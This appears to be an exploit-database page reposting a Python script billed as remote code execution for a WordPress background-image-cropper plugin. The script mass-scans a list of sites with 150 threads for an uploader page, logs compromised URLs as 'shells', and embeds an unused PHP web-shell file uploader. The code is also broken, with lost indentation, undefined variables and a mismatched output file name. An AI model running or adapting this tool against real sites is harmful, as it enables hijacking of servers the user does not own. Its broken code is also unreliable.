WordPress Plugin Background Image Cropper v1.2 – Remote Code Execution

  • 作者: Milad karimi
    日期: 2024-04-21
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51998/
  • # Exploit Title: WordPress Plugin Background Image Cropper v1.2 - Remote Code Execution
    # Date: 2024-04-16
    # Author: Milad Karimi (Ex3ptionaL)
    # Contact: miladgrayhat@gmail.com
    # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
    # Vendor Homepage: https://wordpress.org
    # Software Link: https://wordpress.org/plugins/background-image-cropper/
    # Version: 1.2
    # Category : webapps
    # Tested on: windows 10 , firefox
    
    import sys , requests, re
    from multiprocessing.dummy import Pool
    from colorama import Fore
    from colorama import init
    init(autoreset=True)
    shell = """<?php echo "Ex3ptionaL"; echo "<br>".php_uname()."<br>"; echo
    "<form method='post' enctype='multipart/form-data'> <input type='file'
    name='zb'><input type='submit' name='upload' value='upload'></form>";
    if($_POST['upload']) { if(@copy($_FILES['zb']['tmp_name'],
    $_FILES['zb']['name'])) { echo "eXploiting Done"; } else { echo "Failed to
    Upload."; } } ?>"""
    requests.urllib3.disable_warnings()
    headers = {'Connection': 'keep-alive',
    'Cache-Control': 'max-age=0',
    'Upgrade-Insecure-Requests': '1',
    'User-Agent': 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A
    Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0
    Chrome/60.0.3112.107 Moblie Safari/537.36',
    'Accept':
    'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',
    'referer': 'www.google.com'}
    try:
    target = [i.strip() for i in open(sys.argv[1], mode='r').readlines()]
    except IndexError:
    path = str(sys.argv[0]).split('\\')
    exit('\n[!] Enter <' + path[len(path) - 1] + '> <sites.txt>')
    
    def URLdomain(site):
    if site.startswith("http://") :
    site = site.replace("http://","")
    elif site.startswith("https://") :
    site = site.replace("https://","")
    else :
    pass
    pattern = re.compile('(.*)/')
    while re.findall(pattern,site):
    sitez = re.findall(pattern,site)
    site = sitez[0]
    return site
    
    
    def FourHundredThree(url):
    try:
    url = 'http://' + URLdomain(url)
    check =
    requests.get(url+'/wp-content/plugins/background-image-cropper/ups.php',headers=headers,
    allow_redirects=True,timeout=15)
    if 'enctype="multipart/form-data" name="uploader"
    id="uploader"><input type="file" name="file" size="50"><input name="_upl"
    type="submit" id="_upl" value="Upload' in check.content:
    print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
    open('Shells.txt', 'a').write(url +
    '/wp-content/plugins/background-image-cropper/ups.php\n')
    else:
    url = 'https://' + URLdomain(url)
    check =
    requests.get(url+'/wp-content/plugins/background-image-cropper/ups.php',headers=headers,
    allow_redirects=True,verify=False ,timeout=15)
    if 'enctype="multipart/form-data" name="uploader"
    id="uploader"><input type="file" name="file" size="50"><input name="_upl"
    type="submit" id="_upl" value="Upload' in check.content:
    print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
    open('Shells.txt', 'a').write(url +
    '/wp-content/plugins/background-image-cropper/ups.php\n')
    else:
    print ' -| ' + url + ' --> {}[Failed]'.format(fr)
    except :
    print ' -| ' + url + ' --> {}[Failed]'.format(fr)
    
    mp = Pool(150)
    mp.map(FourHundredThree, target)
    mp.close()
    mp.join()
    
    print '\n [!] {}Saved in LOL.txt'.format(fc)